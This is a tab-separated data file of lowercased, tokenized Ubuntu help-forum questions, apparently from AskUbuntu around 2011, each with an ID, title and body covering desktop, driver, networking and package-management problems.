46646	how to edit iso images ( including bootable isos )	i am looking for tools for ubuntu that can be used to edit iso images . including iso images that are bootable like ubuntu and windows isos . not only edit but save the edited iso and can still boot when burned on an usb drive or cd/dvd .
46654	how to remove weather indicator for one user ?	how do i disable the weather indicator in notification area ? i do n't want to uninstall it because some other users need it . but , as i already run another weather application , this one is unuseful for my session .
46657	show all open windows in 11.04 ?	can someone tell me how i can get an overview of all the open windows ? like htting ctrl+s that shows all the desktops , but for the open applications ? right now when i hit alt+tab it shows quite small tiles in the middle of the screen , is it possible to have all the windows fill all the screens ? ( kind of like expose in osx ) i have compiz installed , and `` static application switcher '' selected , but this does n't have the result i 'm looking for ( and neither does `` application switcher '' . any ideas ?
46658	has ubuntu gone case-insensitive ?	so , i have a folder on my computer which contains these two files ( and other files ) disc membership.pdf disc membership.pdf ( case conflict 1 ) and i have a folder on an external drive which contains the file disc membership.pdf i copy the file from the external drive to the computer harddrive , and find that it is renamed disc membership.pdf ( case conflict 2 ) why ? the folder on the computer is contained within a dropbox folder . could that be a reason ?
46664	how can i install `flashplugin-installer` and `ttf-mscorefonts-installer` without an internet connection ?	is there a way to download the flash plug-in and the microsoft fonts on one computer , and install them on another offline computer ? simply downloading the flashplugin-installer and ttf-mscorefonts-installer packages is n't enough , as both these packages require internet connections during their installation . according to flashplugin-installer 's description : warning : installing this ubuntu package causes the adobe flash player plugin to be downloaded from www.adobe.com . the distribution license of the adobe flash player plugin is available at www.adobe.com . installing this ubuntu package implies that you have accepted the terms of that license . and ttf-mscorefonts-installer has a similar warning : you will need an internet connection to download these fonts if you do n't already have them .
46677	unable get my wireless network connection under awesome window manager ?	unable get my wireless network connection when i switched to awesome window manager . however , automatically i get wireless connection under ubuntu 11.04 classic . could someone tell me how to get wireless connection under awesome window manager .
46679	is there an anglicized transliteration ime for typing arabic ?	in ibus preferences , hindi has 5 different imes ( input method editors ) , some of which utilize anglicized transliteration schemes.. ie . they use the latin alphabet keys on a us keyboard to represent semi-equivalent sounds between the two languages ... chinese has an anglicized transliteration system called 'pinyin ' which is available in ibus ... there is only one arabic ime which shows up in ibus ( i 'm using lucid 10.04 ) .. this arabic ime uses a native arabic keyboard layout , which throws me into a spin , as i 'm not in any way familiar with the layout , nor the script ( yet ) ... is there any such thing as an anglicized ime for arabic , in any form ? .. eg . a later version of ubuntu , or in emacs , etc , or some other specifically-for-arabic program ?
46682	how to setup tethering via usb ?	this article ( the `` how to setup tethering via usb on windows '' section ) lists simple ways to share the 3g connection from a tethered phone with other computers . how could i do this with ubuntu 11.04 ?
46683	why does /var/lock reserve 2gb space ?	i have installed ubuntu 11.04 on my thinkpad x300 which is having 64 gb solid state drive . when i used the df command to learn about the free space , i noticed that there is a mount point /var/lock which is having around 2 gb space as shown below . is it really needed ? i would like to use that space also . how to use that ? please let me know . $ df -k filesystem 1k-blocks used available use % mounted on /dev/sda1 57485580 21128280 33437160 39 % / none 2012364 704 2011660 1 % /dev none 2021604 296 2021308 1 % /dev/shm none 2021604 96 2021508 1 % /var/run none 2021604 0 2021604 0 % /var/lock
46685	how to get window decorations back ?	in 11.04 , using traditional gnome ( not unity ) , windows suddenly lose their decorations way too often : for the next time this happens , can anyone suggest a fix that would be quicker than logging out & back in ( i.e. , having to close all programs ) ? perhaps relaunching some service or process ? nb : simply doing metacity -- replace does not fully fix the gnome session ; at least visual effects are lost .
46687	removed kernel by mistake	i was trying to remove some older versions of my kernel to decrease the grub menu size . and i removed even the newer ones by mistake and did sudo update-grub . now , i get grub menu but have no linux options . can someone please help me how to solve this ?
46688	canon lbp2900 printer only works when connected after log in	i have a canon lbp2900 printer and ubuntu natty 64-bit . after quite some trouble i found here a nice guide explaining a installation procedure with packages from this ppa . i followed the guide and did all steps and now the printer works if it is connected ( or powered on ) after login . if i connect it already before my computer is started , the following happens . a second printer ( lbp2900-2 ) is automatically created and the command sudo /etc/init.d/ccpd status only gives one pid , while it should give two . how can i fix this ? an extra detail that can help ; normally the device uri is ccp : /var/ccpd/fifo0 . actually this path ( /var/ccpd/fifo0 ) does not exist , but that does not seem to matter . the printer that ubuntu automatically adds when starting up with the printer connected has usb : //canon/lbp2900 as uri the output of grep lp /etc/udev/rules.d/* : ~ $ grep lp /etc/udev/rules.d/* /etc/udev/rules.d/85-canon-capt.rules : kernel== '' lp* '' , subsystems== '' usb '' , action== '' add '' , sysfs { idvendor } == '' 04a9 '' , run+= '' /bin/bash /etc/init.d/ccpd start '' /etc/udev/rules.d/85-canon-capt.rules : kernel== '' lp* '' , subsystems== '' usb '' , action== '' remove '' , run+= '' /bin/bash /etc/init.d/ccpd stop ''
46697	script for deleting specific email on the pop server	i have installed popper for notification emails . it is working fine . with popper you can start a script when you click on a email . i am looking for a script so that i can delete a email on the pop server - so i do not need to download it afterwards . ( spam and others ) . who can help ?
46702	removing sources after building from them	suppose , we 've built some package from sources ( configure make install ) . may we remove sources directory after successful building ? or it depends ? on what , then ?
46707	why does n't docky highlight a directory icon when i open it ?	in my docky , i have a home directory launcher/shortcut and computer launcher . whenever i open the home directory launcher it shows the active light under the computer launcher . this behaviour might be due to both launchers launching the same nautilus , but it confuses me because i need to know if the home directory window is already open or not . can this be rectified or is it just a problem with docky ?
46709	how do i switch the keyboard layout so that the apple key is ctrl and the ~ works correctly ?	how do i switch the keyboard layout in ubuntu 11 so that the apple key is ctrl and the ~ works correct ? this is the specific keyboard i 'm talking about : when i hit shift-2 it returns a ``
46712	can i upgrade from 10.04 to 11.04 using iso image	i 'm using 10.04 as only os on my 32-bit pc ( not dual boot ) . can i upgrade to 11.04 using ubuntu-11.04-desktop-i386.iso file without burning on cd or installing on usb drives . i do n't have internet connection , so i can not download alternate version too . any help is appreciated .
46713	what is wrong when the x display does not cover 100 % of the framebuffer on a hp2540p laptop	whenever i have a dual monitor setup on my laptop , one screen is the laptop display and the other the external monitor , i get into trouble with the x server framebuffers . often the larger of the two displays , which is the external monitor , is not fully covered . even when i disable the laptop display the height of the external display is till limited to the same height as the laptop display . no matter how i rearrange the two screens in gnome-display-properties . so basically , where do i start my fault diagnose ? is it gnome , x-server , display-drivers ? which cli tools should i use to verify that all parts of the display system has the same geometry ? also , another frequent problem is that the laptop lcd is often black when resumed from suspended state . i can see that the lcd is active by a faint image of the login window , but the lcd backlit is off . if it is not black , very often the lcd display driver is incorrectly resumed since i get picture disturbances ( flickering random pixeldata in various areas ) as well as h/v flickering shifts . i 've had these problems a lot in ubuntu 10.04 lts but i have recently upgraded to 11.04 lts since all my googling ended up in discussions around problems in 10.10 and solutions in 11.04 . edit similar problem as in this question and this question seems like xrandr is the way to go , i 'll dig in to that tool more later today . maybe i should withdraw my bounty and use the rep 's to get access to the chatroom instead ...
46715	microphone records audio only when it 's called by one process	i am facing a problem where the microphone is recording audio only when it 's called by one process . i.e . i am having a java sound recording application it works fine when i execute it . now i am running a flash application where the flash application also uses microphone object . once again i am running the same java recording application . but this time it 's throwing line not available exception . recording is working fine in windows and mac
46716	how can i restrict users from deleting files ?	how can i restrict user from deleting files ? the user should have read and write rights , but the delete rights should be denied . in windows the same task can be done easily , but i do n't know the way to do this in ubuntu .
46723	why do i get an error when i try to postmap sasl password file with postfix ?	i installed postfix freshly as satellite system . i need to authenticate on my mail providers smpt . there postfix needs to build a sasl database from my sasl-passwd file . but it fails to do just that . how do i fix this error ( last line ) ? : root @ confus : /etc/postfix # echo 'smtp_sasl_auth_enable = yes ' > > main.cf root @ confus : /etc/postfix # echo 'smtp_sasl_security_options = noplaintext noanonymous ' > > main.cf root @ confus : /etc/postfix # echo 'smtp_sasl_password_maps = hash : /etc/postfix/sasl_passwd ' > > main.cf root @ confus : /etc/postfix # ll total 116 drwxr-xr-x 3 root root 4096 2011-06-03 13:56 ./ drwxr-xr-x 154 root root 12288 2011-06-03 13:33 ../ -rw-r -- r -- 1 root root 318 2011-06-03 13:32 dynamicmaps.cf -rw-r -- r -- 1 root root 1562 2011-06-03 13:53 main.cf -rw-r -- r -- 1 root root 5563 2011-06-03 13:32 master.cf -rw-r -- r -- 1 root root 19509 2011-05-10 15:06 postfix-files -rwxr-xr-x 1 root root 8729 2011-05-10 15:06 postfix-script* -rwxr-xr-x 1 root root 25752 2011-05-10 15:06 post-install* drwxr-xr-x 2 root root 4096 2011-05-10 15:06 sasl/ -rw -- -- -- - 1 confus confus 51 2011-06-03 13:56 sasl_passwd -rw-r -- r -- 1 root root 28 2011-06-03 13:43 sender_canonical -rw-r -- r -- 1 root root 12288 2011-06-03 13:47 sender_canonical.db root @ confus : /etc/postfix # postmap sasl_passwd postmap : fatal : open database sasl_passwd.db : permission denied root @ confus : /etc/postfix # postmap hash : sasl_passwd postmap : fatal : open database sasl_passwd.db : permission denied inb4 'sudo ' : notice the `` root @ confus ''
46724	why does n't banshee play music from another filesystem ?	i have all my music in all partitions ; so that windows vista has one , ubuntu has one and my music , videos and more have one and so that the operating systems have their music video whatever on the same location . but every time i reboot ubuntu again and i want to hear music via banshee , it insists on searching in `` username/music '' folder instead of the folder i have selected countless times . is this because the files are on another partition ?
46730	keyboard layout on macbook pro does n't fit the symbols on the keys	i have a macbook pro 5,5 running ubuntu 11.04 natty amd64 . it performs like a dream , but in ubuntu ( both 10.04 , 10.10 and 11.04 ) , i have had problems getting the correct keyboard layout . my macbook pro is with a danish keyboard , and almost all the keys does fit the symbols . but there are some keys that do n't . e.g. , if i wan na type $ , i got ta press alt+4 , where on os x , i can just press on the $ key . if i do , however , press the $ key , it gives me a â˝ . also @ is a bit off . in os x , to type @ , i would press alt+ [ the @ key ] , but in ubuntu , it will type ë ( only with double-press on keys , single press wont do anything ) , and to type @ , i will actually have to press alt+2 . i have set my keyboard layout to danish macintosh keyboard ( with and without dead keys ) and tried all such things , but it does n't fix it . how do i get a proper keyboard layout that matches the symbols on my keys ?
46731	desktop effects suddenly not working	i was trying out a few things yesterday , but i 'm sure this was still working when i turned off my laptop . today none of the keyboard shortcuts listed here is working . and i use super+w quite a lot.. any idea where i can activate them or something ?
46733	how do i start in cli mode using a special boot parameter for the live cd ?	sometimes , i need to test some cli programs without touching my real installation . for that purpose , i use a virtual machine running off a live cd . now , i do n't need a full-blown user-friendly graphical interface , a cli would suffice . i 've earlier found a boot option to accomplish this , but i ca n't find it anymore . what is the boot option for skipping the graphical stuff and booting into a terminal ?
46737	software center not loading software lists	i can open software center and the main page with a list of categories comes up but when i click on an icon or type anything into the search box the loading screen comes up and it just stays like that . running 11.04 . anyone know how to fix this ? thanks in advance .
46738	twinview does n't start at startup	i 've recently installed kubuntu 11.04 and it is running on my dual screen setup . i have nvidia video card and twinview is working perfectly after i switched to the nvidia driver , and i saved the settings to xorg.conf so the second screen would automatically be in use on start up . when i boot , however , the settings in xorg.conf are not used . i 've checked to see if the file is used on start up , and indeed if i add some invalid configuration the x server does not start . so the file is read , but it looks like x ignores the settings in it . i have n't found anything regarding this online , and i believe that the settings in xorg.conf are correct . any ideas as to why the x server does n't seem to be picking up the settings from xorg.conf ? here is the contents of my xorg.conf file : http : //pastebin.com/spt1ldpz
46739	case-sensitivity of account usernames	when installing ubuntu , we 're restricted to lower-case usernames . but recently i registered for a shell based on ubuntu and logging in is done by the username registered to sign in to that site . the username starts with upper-case letter , and when logging using ssh , i need the letter in uppercase to log in - it refuses me if i use lowercase . what 's the deal ? i want to use uppercase letters on the account of my regular install if possible .
46745	how to i set up up dual audio control ( one for speakers and one for headphones ) ?	hen i was running 9.04 , i had separate controls for my headphones ( front jack ) and speakers ( rear jack ) . i upgraded to 9.10 and the separate controls were gone . i just upgraded ( clean install ) o 11.04 and again , only one `` slider '' for audio . any thoughts ?
46746	is there a detailed api documentation on the python binding for appindicator ?	i 'm getting serous with a project of my own and need a good documentation on the appindicator module for python . what i 've found so far : api documentation on dev.ubuntu.com community wiki entry api documentation on the c code nice blog post what 's wrong with them : just a list with no explanations on the arguments , returns and on what the methods do only design considerations and backgrounds - little that would help with actual programming stuff missing the python module has ( e.g . create_menu_from_desktop ) much useful information compressed but not complete so basically i need something as detailed as 3. but for the python module . example on my problem : void build_menu_from_desktop ( desktop_file , desktop_profile ) what 's are the arguments supposed to be and what does the method do ? my guess is , the method creates menu entries from a '*.desktop ' file . but if so , why does it need more arguments than just that file ? which entries in the file does it take the menu items from ? it 's questions like this i 'm having a bit of a hard time finding an answer for .
46748	automatic login on headless , console-only computer	i am working with a gumstix computer running a console-only version of ubuntu ( courtesy of the linaro project , which is quite fantastic ) , and when i boot the computer while connected to it over a serial console ( ttyusb ) it automatically launches as root . i think this is a terrible idea . i 'd rather it login as the user i 've set up . how can i set this up ?
46751	installing multiple versions of ubuntu	i want to set up a system for testing where i can boot into ubuntu 8 , 9 , 10 , and 11 . what would be the best way to partition my drive to do this ? also easiest way to configure grub2 ?
46756	how can i change labels created with build_menu_from_desktop ( ) in pythons appindicator module ?	suppose i created an indicator with appindicator for python . suppose i used the line build_menu_from_desktop ( `` /my/path/myfile.desktop '' , `` unity '' ) for that . how would i go about changing the created menu-items ? their labels for example ?
46757	tomcat 6 : catalina_home vs. catalina_base	i ca n't find a definitive answer to why ubuntu would set the catalina_base environment variable , making it different from catalina_home . i found this document which suggests that not setting catalina_base would make it equivalent to catalina_home . that document also suggests that setting catalina_base would be done to make multiple instances available . however , i do n't seem to be able to find anything that explains this . presumably , running with a single catalina_home has been good for a long time , but ubuntu switched . i found this question with an illuminating answer on askubuntu but there is n't much specifically on catalina_home vs. catalina_base . that question does allude to the `` appbase '' parameter , which is documented in the tomcat6 documentation for the host container in the configuration file . here 's the questions : why are these two variables separated ? when should they be separated ? what does this allow the administrator to do ? what do you then place into each directory ? when should these two variables be the same ? what does asf recommend for standard practice ?
46761	how do i get the names in my icon theme for use with pythons appindicator module ?	how do i get the strings i can insert instead of 'gtk-execute ' ? # ! /usr/bin/python import gobject import gtk import appindicator if __name__ == `` __main__ '' : ind = appindicator.indicator ( `` example-simple-client '' , `` gtk-execute '' , appindicator.category_application_status ) ind.set_status ( appindicator.status_active ) menu = gtk.menu ( ) for i in range ( 3 ) : buf = `` test-undermenu - % d '' % i menu_items = gtk.menuitem ( buf ) menu.append ( menu_items ) menu_items.connect ( `` activate '' , gtk.main_quit ) menu_items.show ( ) ind.set_menu ( menu ) gtk.main ( ) my answer below pretty much does it . still it would be nice to have some python code that puts out all available icons .
46764	empathy does n't obey system/theme/gnome-appearence font settings	i actually had this problem since at least 10.04 . empathy ignores gnome-appearance-properties , and settings in /etc/fonts/fonts.conf it 's not just a matter of font size , but also it renders unicode incorrectly due to none configurable font settings that also does n't obey system settings . is there a work around for this ? because the empathy guys have n't even confirmed these bugs yet .
46766	how do i go `` back '' in shotwell ?	when i browse through a long list of events and then double-click an event to view its photos , how do i get back to where i was in the list of events so i can continue browsing ? my usage pattern is this ( though on the scale of about a thousand more events ) : glance at event # 1 thumbnail . glance at event # 2 thumbnail . glance at event # 3 thumbnail . glance at event # 4 thumbnail . glance at event # 5 thumbnail . peruse event # 6 photos . glance at event # 7 thumbnail . glance at event # 8 thumbnail . peruse event # 9 photos . glance at event # 10 thumbnail . glance at event # 11 thumbnail . glance at event # 12 thumbnail . glance at event # 13 thumbnail . peruse event # 14 photos . i 'm not sure how to go from step 6 to 7 and from step 9 to 10 .
46773	how do i get a winbond wireless card to work ?	i own a technology blog and i received a question via e-mail asking how to get a winbond wireless card to work on linux ( preferably ubuntu ) . i do n't personally have any experience getting winbond cards up and running on linux and a search of the internet did n't seem to turn up any results . apparently ndiswrapper fails to detect the card as well . if anyone could provide some assistance in getting an internal , winbond networking card working with linux i would be most appreciative .
46774	why ca n't i get overlay scrollbars in gnome3 ?	how do i enable the overlay-scrollbars in gnome3 ?
46775	getting wifi to work on my acer laptop	i have windows installed on my acer laptop and recently installed ubuntu ( using their installer for windows ) so there are now 2 os 's installed . ubuntu was unable to connect to the wifi , so i can only get internet on it when plugged in . the laptop is an acer extensa 4420 , and the network adapter is broadcom 802.11g . windows lists its drivers as bcmwl6.sys and also 3 drivers called bcmihvsrv.dll or something similar . how do i get wifi enabled on it ?
46779	how to disable window maximizing when dragging to top panel	unity mimics the behavior of windows 7 's aero snap . that is , when dragging a window and hitting the top panel with the mouse , the window gets maximized . is there a way to prevent this , at least for me , annoying behavior ?
46781	how to get ubuntu installed on a flash drive that can be accessed in windows ?	i have a flash drive that i am considering installing ubuntu on . however , i would also like the contents to be accessible in windows . is this possible ? some further details : i ruled out ntfs because ( iirc ) it ca n't be mounted as / . it needs to be formatted with a filesystem that windows will recognize without any ifs drivers or utilities that require admin privileges .
46783	is it possible to pass passwords on a shell script ?	long time i am searching for this , i would like to know is it possible to pass passwords in a shell script ? many of the answers returned with no . recently i read an article stating that how to pass passwords in a shell script . i have tried that , but it does n't seem to work . this is the link . can anyone checkitout and revert back ? also pls say me is there a way to pass passwords in a shell script ? if no pls say me how linux gets the input for the password ?
46784	error `` printer 'mfc6890cdw ' may not be connected . ''	i tried to print the test page , but i got this error message . i installed the lpr driver first , then the cupswrapper from this site : http : //welcome.solutions.brother.com/bsc/public_s/id/linux/en/download_prn.html # mfc-6890cdw how can i fix this ? the cups error-log : e [ 03/jun/2011:21:05:52 +0200 ] [ cgi ] timeout reached e [ 03/jun/2011:21:05:52 +0200 ] [ cgi ] timeout reached e [ 03/jun/2011:21:11:44 +0200 ] [ job 2 ] keine % % boundingbox : kommentar im header ! e [ 03/jun/2011:21:15:52 +0200 ] [ job 4 ] keine % % boundingbox : kommentar im header ! printer : brother mfc6890cdw os : ubuntu 11.04 uri : usb : /dev/usb/lp0 the output of dpkg -l grep -i brother : ii brother-cups-wrapper-common 1.0.0-10-0ubuntu5 common files for brother cups wrapper packages ii brother-cups-wrapper-extra 1.2.1-0ubuntu3 cups wrapper drivers for extra brother printers ii brother-lpr-drivers-common 1.0.0-4-0ubuntu1 common files for brother-lpr-drivers packages ii brother-lpr-drivers-extra 1.2.0-2-0ubuntu4 - rc mfc6890cdwlpr 1.1.2-4 brother lpr inkjet printer definitions now i installed the drivers from the software center , but in none of the desciptions the exact name of my printer . it is n't even recognized in the print-dialogue now . i think the issue is that the printer uses wifi and i was using ethernet . apparently can either be used over lan or wlan , but not both at the same time . i will try to access it via wlan later .
46785	is the opengl greeter ( facebrowser ) still on the table ?	a few years ago , there was an opengl greeter ( gdm facebrowser ) , which would narrow down the user list as you type the user name . here is the video : link . can someone tell me if it is still under development , or if something similar is planned for ubuntu ?
46786	reconnecting to a ppp connection on a verizon wireless modem	ok , i have a shell application running on ubuntu 11.04 which must use a verizon wireless modem to stay connected . i ca n't figure out how to invoke this application from the shell , but can do so from the gui . if the pc looses power , ubuntu must wake up , log in , start the application in it 's last know state , and connect back to the internet . since the application is remote , i need the pc to reestablish the wireless connection whenever it drops said connection , and keep trying until it does . i have set the ppp0 as the default connection in network manager . however , the only way i have found to start the connection after disconnect is by killing networkmanager , then network-manager reconnects automatically . the connection : ppp0 link encap : point-to-point protocol inet addr : xxx.xxx.xxx.xxx p-t-p : xxx.xxx.xxx.xxx mask:255.255.255.255 up pointopoint running noarp multicast mtu:1500 metric:1 rx packets:211 errors:0 dropped:0 overruns:0 frame:0 tx packets:217 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:26851 ( 26.8 kb ) tx bytes:18801 ( 18.8 kb ) the process seems to change every time i run it . the networkmanager seems to autoincrement the number after ... /ppp . i want to be able to run this connection with all of it 's functionality from the shell . : /usr/sbin/pppd nodetach lock nodefaultroute ttyusb0 noipdefault noauth usepeerdns lcp-echo-failure 5 lcp-echo-interval 30 ipparam /org/freedesktop/networkmanager/ppp/3 plugin /usr/lib/pppd/2.4.5/nm-pppd-plugin.so lsusb : bus 002 device 006 : id 1410:6000 novatel wireless can someone provide me with the shell command i can use to invoke the above connection without killing network manager each time ?
46788	is it possible to restart the unity panel without restarting compiz ?	i 'm being hit ( quite often ) by that bug where you ca n't click on some indicators . it 's easy to fix by restarting unity , but that usually also means running to the risk of upsetting some window on re-parenting ( rare , but i 'd rather avoid any such problems ) . so , i know there is `unity-panel-service ' , and i 'm guessing this might have something to do with the solution ? is it possible to restart the unity panel ( or the entire unity plugin ) without restarting compiz itself ?
46800	how do i get a saa7231 tv tuner card working ?	i have recently bought a new pc and installed ubuntu ( as you do ) all works well but my tv tuner is n't being detected . the model is a saa7231 , can someone please help me install it . what steps do i need to take firstly to give you all the correct info ? thanks in advance .
46803	how to deny vnc access to a particular ip ?	i just want to deny vnc access to particular ip addresses . is it possible ? if yes how to acheive this task ?
46804	printing comments with pdf	is there a way to print the comments that are associated with a pdf on the linux version of adobe acrobat 9 ? both acroread and evince display the comments just fine , however the linux version of the reader lacks the button in the print dialogue to enable printing comments . specifically i 'm looking to recreate this feature ( image taken from adobe.com ) where the comments are printed on a seperate page with lines to the main document indicating where the comment was inserted . please note : i am not asking to modify or write comments and annotations ( typically a feature associated with acrobat pro ) , but to merely print them in a conveniently readable way .
46807	how to access windows speaker from ubuntu ?	is it possible to play a sound file which is in my ubuntu system but to the windows speaker ? i am runnning ubuntu 10.04 with ip i.e 172.29.32.10 and the speaker is connected to windows xp professional with ip say 172.29.32.15 . what i want to acheive it i just want to play a sound file in ubuntu using the windows speaker . it means the sound should be heard in windows speaker . possible ?
46814	`` create launcher ... '' on desktop did not work	`` create folder '' and `` create document '' worked well . but nothing happened when click `` create launcher '' . it 's annoying to create launchers in terminal . so what can i do ?
46817	indicatorappletfactory : :indicatorapplet warning	when i boot , i often encounter this warning . how can i get rid of this ? the panel encountered a problem while loading `` indicatorappletfactory : :indicatorapplet '' . do you want to delete the applet from your configuration ? i use ubuntu 11.04 . in $ home/.xsession-errors , the following part seems to be relevant . initializing nautilus-gdu extension ( nautilus:1490 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed ** ( gnome-panel:1493 ) : warning ** : failed to load applet indicatorappletfactory : :indicatorapplet : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `org.gnome.panel.applet.appletfactory ' on object at path /org/gnome/panel/applet/indicatorappletfactory
46819	how do i delete one item from the list of 10 `` recent documents '' in libreoffice writer ?	how do i delete one item from the list of 10 `` recent documents '' in libreoffice writer ?
46820	how to fix `` problem with mergelist '' error when running an update ?	after `` sudo apt-get update '' in terminal , i get : 58 % [ 99 translation-en lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] 16.4 kb/s 4s/usr/bin/lzma : decoder error 58 % [ 100 translation-en_nz lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] 16.4 kb/s 4s/usr/bin/lzma : decoder error 58 % [ 101 translation-en lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] 16.4 kb/s 4s/usr/bin/lzma : decoder error 58 % [ 102 translation-en_nz lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] 16.4 kb/s 4s/usr/bin/lzma : decoder error 58 % [ 103 translation-en lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] 16.4 kb/s 4s/usr/bin/lzma : decoder error 58 % [ 104 translation-en_nz lzma 0 b ] [ waiting for headers ] /usr/bin/lzma : decoder error 58 % [ 105 translation-en lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 106 sources lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 107 sources lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 108 sources lzma 0 b ] [ 42 sources lzma 0 b ] /usr/bin/lzma : decoder error 58 % [ 109 sources lzma 0 b ] [ 47 sources lzma 0 b ] /usr/bin/lzma : decoder error 58 % [ 110 sources lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 111 sources lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 112 sources lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 113 sources lzma 0 b ] [ 114 packages xz 0 b ] /usr/bin/lzma : decoder error 58 % [ 114 packages lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 115 packages lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 116 packages lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 117 packages lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 118 translation-en_nz lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 119 translation-en lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 120 translation-en_nz lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 121 translation-en lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 122 translation-en_nz lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 123 translation-en lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 124 translation-en_nz lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error 58 % [ 125 translation-en lzma 0 b ] [ connecting to archive.ubuntu.com ( 91.189.88.45 ) ] /usr/bin/lzma : decoder error fetched 190 kb in 23s ( 7,917 b/s ) reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_natty_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . last 37 lines only . i 've deleted every thing in the /var/lib/apt/lists directory ( actually backed it up ) and ran sudo apt-get update in a terminal . i still getting an error : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_natty_main_binary-i386_packages e : the package lists or status file could not be parsed or opened .
46822	java seems to cause fatal system error	i have a certain java program that occasionally causes ubuntu to crash . the sound gets stuck on a short loop , the screen output actually ceases ( i.e . monitor can find no input and turns off ) and no keyboard or mouse inputs work . i have to restart it from the physical power button . my question is n't how to fix it because i do n't know what is actually happening . i would like to know what logs or logging programs i could look at to get any information on why this is happening . it would be useful information to include in a bug report to whomever it may concern .
46826	how to install libreoffice 3.4 final in ubuntu 11.04 or 10.10	how do i install the final version of libreoffice 3.4 in ubuntu 10.10 , 11.04 and the latest version of 11.10
46833	difference between ubuntu and linux mint	just did a live usb of linux mint 11 ( dvd edition ) and could n't find major differences bar unity in 11.04 . are there any major differences ?
46836	internet is often very slow in natty	i recently upgraded from maverick to natty on a dual boot with windows xp . my internet worked great at first , but more and more frequently i have been experiencing slow connection , not just on the browser , but with any application that connects to the internet . the connection works fine on windows , which is what i 'm using right now . i looked up my problem on google . based on my search results , it seems like a common problem . i found something about disabling ipv6 . i did so , but the connection did not seem to get any faster . i 'd greatly appreciate any thoughts on what to do . i 've tried a couple of other methods , but was unsatisfied with the results ; the connection did not become any faster . update i tried the method shown here , hoping this might work for me , but now i ca n't connect to the internet at all . the `` network connections '' button in `` system settings '' is also gone , so i ca n't edit my connections anymore . did anyone also have the same thing happen ? i 'm considering re-installing maverick .
46837	audio stopped working in 11.04	today , maybe after some automatic updates , my audio stopped to work ... does n't work anymore both with alsa ( the default one ) and pulseaudio.. so i 've tried to install also oss ( does n't work so i 've removed ) . what can i try to do ? : (
46840	check if pendrive is persistent ?	i have a bunch of pendrives with live linux isos loaded onto them and i would like to check one if it is persistent . rebooting is not an option right now ( system rescue ) . is there a simple command or utility to check if the current pendrive linux installation is persistent on the pendrive ?
46842	sum of text source delimited by whitespace	how to get the sum of each column from file like : 123 32 122 43 11 0 444 112 32 and give the result as : 610 155 154 in a simple command ? it should be easy in perl , but i 'd like to know if someone had already packaged it in universe repository or somewhere else , along with other utilities to do with text tables .
46848	available instant messaging clients	am looking for an all-round messenger for ubuntu , especially one that supports webcam , voice chat , microphone , drag/drop support , file sending and other normal operations a messenger should have . i have tried amsn , kmess , emesene , pidgin and i am currently using emesene . what messenger client would you recommend and what features do they offer in terms of : webcam voice chat drag & drop support file upload/download emoticons skin theme ubuntu notification compatibility compatibility with other messengers updated messenger ( there are many that their last update was when star trek 1 came out ) compatibility with email services ( sites like yahoo , hotmail or google and their services like google talk ) any other you can think of . what ( unique ? ) features does your messenger client offer ? note - i have posted some messengers from a little over 2 years of experience with each ( i normally install several messengers ) to help anybody that wants to try any of them .
46849	how to install the latest mumble server ?	how to install the latest version of the mumble server in ubuntu server 11.04 and configure it correctly . i have tried several times and it did n't work out properly .
46856	has anyone lost his/her data or os while installing ubuntu and is it safe to not back up my data ?	has anyone lost his/her data or os while installing ubuntu ( not accidentally by clicking `` erase the whole driv e '' ) ( and how many peopwle ) ? i have 110 gb of data and i do not want to back up my data on a hard drive ( i do not have one anyway ) as it will take too long . i also do not want to spend money to get a dropbox/sugarsync account to back up my data . so my second question is whether it is safe to not back up my data .
